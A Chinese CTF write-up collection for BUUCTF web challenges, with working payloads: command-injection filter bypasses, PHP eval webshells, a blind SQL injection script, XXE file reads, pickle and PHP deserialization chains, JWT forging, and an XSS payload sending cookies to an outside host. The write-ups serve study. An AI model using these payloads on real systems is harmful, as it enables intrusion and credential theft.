        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

绕过1 intval($num) < 2020 && intval($num + 1) > 2021

可以利用 intval(0x7e6) 实现绕过

/fl4g.php?num=0x7e6
绕过2 $md5==md5($md5)

要绕过这个我需要 md5 加密数组返回 NULL 但是数组不是NULL

所以数组绕过不能实现

利用科学计数法来绕过 0e 加密后开头还是 0e的
1
/fl4g.php?num=0x7e6&md5=0e215962017
绕过3
1
2
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
过滤了空格我们可以利用 $iFS$9 代替空格

str_ireplace("cat", "wctf2020", $get_flag); 过滤cat 我们可以利用反斜杠绕过

代替cat: more、less、head、tail、sort
执行 ls /fl4g.php?num=0x7e6&md5=0e215962017&get_flag=ls

得到一个 fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag 文件名

我们用 ca\t 打开前
payload

/fl4g.php?num=0x7e6&md5=0e215962017&get_flag=ca\t$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

[网鼎杯 2020 朱雀组]Nmap

2020.11.13

考点

Nmap 写文件

-oG

选项	解释
-oN	标准保存
-oX	XML保存
-oG	Grep保存
-oA	保存到所有格式
-append-output	补充保存文件

做题步骤

[BUUCTF 2018]Online Tool 相同类型

直接写文件

' <?php @eval($_POST["jly"]);?> -oG 0xc4m3l.php '

发现报错

发现会检测 php 字符

利用短标签保存为 phtml 文件

' <? @eval($_POST["jly"]);?> -oG 0xc4m3l.phtml '

访问下

发现写入了

于是利用蚁剑进行连接

[极客大挑战 2019]FinalSQL

2020.11.17

考点

Sql 注入

盲注

做题步骤

exp

import requests
import io
import sys
import string
import time

'''
#构造sql注入语句
F1naI1y,Flaaaaag
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20
ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s
ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s
ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s
'''
url = "http://8e949ef2-5518-49da-b68d-73dea1d640bd.node3.buuoj.cn/search.php?id=1=(ascii(substr((select(group_concat(password))from(F1naI1y)),%s,1))=%s)=1"
ss = ""
x = string.printable

for i in range(172,1000):
	for j in x:
		payload = url5%(str(i),ord(j))
		print(payload)
		# time.sleep(0.5)
		s = requests.get(payload)
		if 'NO! Not this! Click others~~~' in s.text:
			ss += j
			print(ss)
			break

先测试 f 开头的位置是在第 172 个

所以我们直接从172 开始爆破

[MRCTF2020]PYWebsite

2020.11.17

考点

地址验证 X-Forwarded-For client-ip

做题步骤

打开网站发现给购买flag

但是要钱

不能购买查看源代码

发现 js 代码

function enc(code){
  hash = hex_md5(code);
  return hash;
}
function validate(){
  var code = document.getElementById("vcode").value;
  if (code != ""){
    if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
      alert("您通过了验证！");
      window.location = "./flag.php"
    }else{
      alert("你的授权码不正确！");
    }
  }else{
    alert("请输入授权码");
  }
  
}

里面有一个 ./flag.php

有一句提示

验证逻辑是在后端的，除了购买者和我自己，没有人可以看到flag

说明可能会验证是不是本地 ip

Bp 抓包修改修改 ip 为 127.0.0.1

[NCTF2019]True XML cookbook

2020.11.18

考点

XXE漏洞可以直接攻击内网用户，先查看内网存活主机：

做题步骤

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

配置payload

爆破得到 flag

[CISCN2019 华北赛区 Day1 Web2]ikun

2020.11.21

考点

jwt

https://jwt.io/#debugger-io

https://github.com/brendan-rius/c-jwt-cracker

Python 反序列化

https://xz.aliyun.com/t/2289

https://blog.csdn.net/SKI_12/article/details/85015803

http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/

loads方法(反序列化)

https://docs.python.org/2/library/pickle.html#object.__reduce__

构造的关键就是__reduce__函数，这个魔术方法的作用根据上面的文档简单总结如下：

如果返回值是一个字符串，那么将会去当前作用域中查找字符串值对应名字的对象，将其序列化之后返回，例如最后return 'a',那么它就会在当前的作用域中寻找名为a的对象然后返回，否则报错。

如果返回值是一个元组，要求是2到5个参数，第一个参数是可调用的对象，第二个是该对象所需的参数元组，剩下三个可选。所以比如最后return (eval,("os.system('ls')",))，那么就是执行eval函数，然后元组内的值作为参数，从而达到执行命令或代码的目的，当然也可以return (os.system,('ls',))。

做题步骤

查看网页可以注册等，但是注册只有 10块钱

主页有个一定要买到 lv6 的提示

返现页面下面的shop里面有很多的账号信息。而且有很多页数(500 页都有回显)，我们要在这些页数里面找到对应的 lv6 想办法去得到这个网页数据里面 python 脚本

import requests
import time

url = "http://e9a9e565-ce3c-4f59-806d-315af6e6bbfb.node3.buuoj.cn/shop?page="
requests = requests.session()
for i in range(600):
    U = url+str(i)
    print(U)
    res = requests.get(U).text
    time.sleep(0.4)
    if "lv6.png" in res:
        print("get the page "+str(i))
        break

注意要 sleep 不然会被ban 得到 181页有个 lv6

要特别多钱但是自己的账号只有 10块

购买

然后发现前端的提交表单有个 0.8 刚好是优惠的比例尝试修改后提交

点击结算后购买成功页面发生了跳转。

尝试注册 admin 账户发现不能注册成功、

绕过 admin 想到可以cookie 验证

查看 cookie 信息有个 JWT

利用 https://jwt.io/ 解密发现 username : 123 的判断可能需要用户名为 admin

对于 jwt 加密我们需要知道对应的 key 才能进行一个加密得到对应的 username 为 admin 的 JWT

https://github.com/brendan-rius/c-jwt-cracker

利用上面的功能

利用 linux docker

进入输入 make

会编译好文件

然后利用对应工具解密

./jwtcrack "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMyJ9.t_quUTD2cAx9tGvCi1tmfSmgP_z_hr2N8lx_Ij5bh78"

得到 key

Secret is "1Kun"

从而修改对应的信息得到 admin 对应的 jwt

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

然后修改后刷新从而可以查看

点击成为大会员没什么反应查看源码

发现有一个 www.zip 的文件

访问下载文件

发现是 py 文件

代码审计

发现 setting.py 中有 hint

得到没有什么用的提示

python 反序列化

继续在代码中发现 Admin.py

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

里面有一个 post 接受 become 参数。接受的 become 参数 url编码编码后利用了 pickle.loads 进行反序列化。

因为这个是一个 python2

所以我们用 python2 来生成反序列化

import pickle
import urllib
 
class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))
 
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
# c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.

抓包发现点击成为大会员的时候

想要成为 admin

我们替换为我们的输入

得到 flag

[NPUCTF2020]ReadlezPHP

2020.11.29

考点

php 反序列化

eval定义和用法
函数把字符串按照 PHP 代码来计算，该字符串必须是合法的 PHP 代码，且必须以分号结尾。
如eval(“echo 1;”)

eval() 函数把字符串按照 PHP 代码来计算（计算=执行）。
该字符串必须是合法的 PHP 代码，且必须以分号结尾。
如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false
assert函数
 功能是判断一个表达式是否成立，返回true or false，重点是函数会执行此表达式。如果表达式为函数如assert(“echo(1)”)，则会输出1，而如果为assert(“echo 1;”)则不会有输出。

做题步骤

打开网页发现在图片中间下方有一个时间，每次刷新都在变化。
尝试抓包看结果发现没什么特别的
然后返现网页前端 qq 号可以点击

查看源码发现有两个 href

访问 /time.php?source

得到网页源代码

这里有一个 $_GET[‘data’] 传参。且能进行反序列化

我们发现前面的序列化 $b 为方法。 $a 为参数测试发现 eval 不能使用不了（eval 在高版本不是函数）所以要用到 assert() 断言函数

exp

<?php
class HelloPhp
{   
    public $a = 'phpinfo();';
    public $b = 'assert';

    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}

$c = new HelloPhp;

var_dump(serialize($c));
# O:8:"HelloPhp":2:{s:1:"a";s:10:"phpinfo();";s:1:"b";s:6:"assert";}

发现能够调用

网页搜索到 flag

[BJDCTF2020]EasySearch

2020.12.1

考点

.swp 文件泄露

Shtml SSI 代码注入

做题步骤

开局登录框

试了弱密码都不行

也没用注入

尝试扫目录

发现有一个 index.php.swp http://2d56884b-47b0-41c3-a063-8b8ab5215b12.node3.buuoj.cn/index.php.swp

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

代码中要求我们的输入 md5 加密后前 6 位的值为 '6d0bc1'

直接python爆破

import hashlib

def md5(a):
    return hashlib.md5(a.encode('utf-8')).hexdigest()

for i in range(0,100000000):
    if md5(str(i))[:6] == '6d0bc1':
        print (str(i))
        break
# 2020666

得到 2020666 这个值

利用任意账号名密码为 2020666 能成功登陆

登陆后我们会发现在返回包里面地址

进行访问。发现记录了我们的 id 和登陆时间登陆 ip 等

发现是 shtml 文件后缀。百度发现对应这个文件可能存在 SSI 注入

 进行命令注入

我们发现整个网站对应的 username 是我们可控的。

我们就利用这个地方来查看

访问返回的网站

发现是能够实现命令执行的说明存在漏洞

但是没有 flag 于是我们利用  查找对应的 flag

直接查看 ./flag

访问对应目录得到flag

得到 flag

[BJDCTF 2nd]xss之光

2020.12.1

考点

xss 泄露 cookie

原生类反序列化

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

做题步骤

刚开始页面什么都没有也没有提示

扫一下目录

发现有 .git 泄露

得到 index.php 文件

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

有一个反序列化

在调用反序列，然后会调用一个 echo 这个 echo 会调用 __tostring() 魔术方法

测试 xss 的存在

<?php
$a = new Exception("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
# O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A65%3A%22%2FUsers%2F0xc3m4l%2FDesktop%2FFile%2FWeb%2FBuu%2F%5BBJDCTF+2nd%5Dxss%E4%B9%8B%E5%85%89%2Fexp.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

成功弹窗

于是可以利用 xss 得到 cookie 的值（一般xss 的题目 flag 都在 cookie 里面

$a = new Exception('<script>window.open("http://8d021db4-5e19-415e-bf2b-1aa8cb6c7233.node3.buuoj.cn/?"+document.cookie);</script>');
$b = serialize($a);
echo urlencode($b);
# O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%22http%3A%2F%2F8d021db4-5e19-415e-bf2b-1aa8cb6c7233.node3.buuoj.cn%2F%3F%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A65%3A%22%2FUsers%2F0xc3m4l%2FDesktop%2FFile%2FWeb%2FBuu%2F%5BBJDCTF+2nd%5Dxss%E4%B9%8B%E5%85%89%2Fexp.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A8%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

[GKCTF2020]老八小超市儿

2020.12.2

考点

Shopxo （可以直接收到对应的渗透文章

https://www.codenong.com/cs106430299/

做题步骤

访问后台admin.php

/admin.php?s=/admin/logininfo.html
默认账号密码登录 admin/shopxo 进入后台
在后台找到应用中心-应用商店-主题，然后下载默认主题。
下载后加入一句话然后上传文件打包上传
1
2
3
<?php
@eval($_POST['jly']);
phpinfo(); ?>

在网址管理-主题管理处上传

然后我们要做的就是去找到对应上传的文件的路径
查看源码发现

所有我们测试去找到对应的 jly.php 的位置

/public/static/index/default/jly.php

找到位置访问执行了 phpinfo();

说明上传成功。我们可以执行。

利用蚁剑链接

在更目录发现 flag

提示 flag 在 /root 里面

但是发现没有权限访问

查看 flag.hint 文件

说明是可以得到 root 里面的文件的

然后发现

然后我们去查看 /var/mail/makeflaghint.py 文件

利用打开并写了文件

修改内容为

import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")
flag=io.open("/root/flag",'r').read()
f.write(str(flag))
f.write(str(gk1))
f.write(str(gk))
f.close()

保存后等待。会把 /root/flag 的内容写到 /flag.hint 中

[MRCTF2020]Ezpop

2020.12.2

考点

反序列化

做题步骤

网页直接源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

一共有 3个 class 然后对我们传入 pop 进行反序列化

对应的

Modifier类有一个 include 可以利用伪协议得到 flag

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

__invoke方法是当脚本尝试将对象调用为函数时触发

show类

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

里面有一个 __wakeup() 方法，使用反序列化的时候触发，而这里同时也可以触发__toString方法。

__toString方法，当前对象访问str再访问source，然后返回这个值，就是把类当作字符串使用时触发。

然后发现里面没有过滤我们的 filter 伪协议

test 类

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

__construct方法，把p对象变成一个数组。

__get方法，从不可访问的属性中读取数据会触发

目的调用 Modifier 类调用 __invoke() 从而调用 include 伪协议得到 flag
到利用 __invoke() 我们必须要让这个类被当做函数调用。这里需要利用到 Test 类里面的 __get() 魔术方法讲 $function 初始化为 modifier 类。
然后要香办法调用 Test 类的 __get() 魔术方法。当访问 Test 里面没有的属性时会调用 __get() ，发现在 show 类里面有个 __toString() 模式方法当在调用echo 的时候会被调用到。如果我们讲 show 类里面的 $str 赋值为 Test 类这样在调用 show 里面的 echo 函数时候就会调用到 __toString() 返回 Test的source 属性但是 Test 没有这个属性，从而就会调用到 Test 的__get() 魔术方法。从而实现调用
要让 Show 类调用 echo 函数直接反序列化调用__wakeup 就好
这样我们的 pop 链就想好了

<?php
class Modifier {
    protected  $var = "php://filter/convert.base64-encode/resource=flag.php";
}

class Show{
    public $source;
    public $str;
    public function __construct($file){
        $this->source = $file;
      
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }
}
$o = new Show('0xc4m3l')
$o->str= new Test();
$b = new Show($o);
echo urlencode(serialize($b));
# O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A7%3A%220xc4m3l%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

/?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A7%3A%220xc4m3l%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFnezAzMjY2ZjNhLWFlMGYtNGUyMS1hMTE5LTg4YjZkNDdjZWQxMH0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+

得到 flag

文件响应头

[BJDCTF2020]ZJCTF，不过如此

考点

做题步骤

[GKCTF2020]CheckIN

考点

做题步骤

[BJDCTF 2nd]假猪套天下第一

考点

做题步骤

[SUCTF 2019]Pythonginx

考点

做题步骤

[网鼎杯 2020 朱雀组]phpweb

考点

做题步骤

[0CTF 2016]piapiapia

考点

做题步骤

[ASIS 2019]Unicorn shop

考点

做题步骤

[NCTF2019]Fake XML cookbook

考点

做题步骤

[CISCN 2019 初赛]Love Math

考点

做题步骤

[BJDCTF2020]Cookie is so stable

考点

做题步骤

[WesternCTF2018]shrine

考点

做题步骤

[BJDCTF 2nd]简单注入

考点

做题步骤

[安洵杯 2019]easy_serialize_php

考点

[BSidesCF 2020]Had a bad day

考点

做题步骤

[WUSTCTF2020]朴实无华

考点

做题步骤

[网鼎杯 2020 朱雀组]Nmap

考点

做题步骤

[极客大挑战 2019]FinalSQL

考点

做题步骤

[MRCTF2020]PYWebsite

考点

做题步骤

[NCTF2019]True XML cookbook

考点

做题步骤

[CISCN2019 华北赛区 Day1 Web2]ikun

考点

做题步骤

[NPUCTF2020]ReadlezPHP

考点

做题步骤

[BJDCTF2020]EasySearch

考点

做题步骤

[BJDCTF 2nd]xss之光

考点

做题步骤

[GKCTF2020]老八小超市儿

考点

做题步骤

[MRCTF2020]Ezpop

考点

做题步骤